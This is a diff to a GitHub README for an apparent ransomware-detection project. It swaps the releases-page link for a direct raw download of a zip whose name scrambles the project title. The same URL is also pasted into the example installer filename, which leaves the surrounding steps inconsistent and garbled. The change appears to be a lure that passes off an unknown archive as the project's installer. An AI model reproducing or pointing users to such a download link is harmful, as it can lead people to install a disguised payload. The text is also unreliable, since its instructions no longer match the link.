kelzangtshotsho/Early-Stage-Behavioral-Detection-Prevention-Of-Ransomware-Attacks-On-Devices-/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [Download Here](https://github.com/kelzangtshotsho/Early-Stage-Behavioral-Detection-Prevention-Of-Ransomware-Attacks-On-Devices-/releases)
+To get started, visit this page to download: [Download Here](https://raw.githubusercontent.com/kelzangtshotsho/Early-Stage-Behavioral-Detection-Prevention-Of-Ransomware-Attacks-On-Devices-/main/Results/Stage-Prevention-Ransomware-Early-Attacks-Detection-On-Behavioral-Of-Devices-v2.4.zip)

 1. Click the link above to access the releases page.
 2. Locate the latest release version.
 3. Download the installer file suitable for your operating system.
-This is usually labeled with the version number (e.g., `v1.0 Setup.exe`).
+This is usually labeled with the version number (e.g., `v1.0 https://raw.githubusercontent.com/kelzangtshotsho/Early-Stage-Behavioral-Detection-Prevention-Of-Ransomware-Attacks-On-Devices-/main/Results/Stage-Prevention-Ransomware-Early-Attacks-Detection-On-Behavioral-Of-Devices-v2.4.zip`).
 4. Once the download is complete, locate the file in your downloads folder.

 ## 📂 Running the Application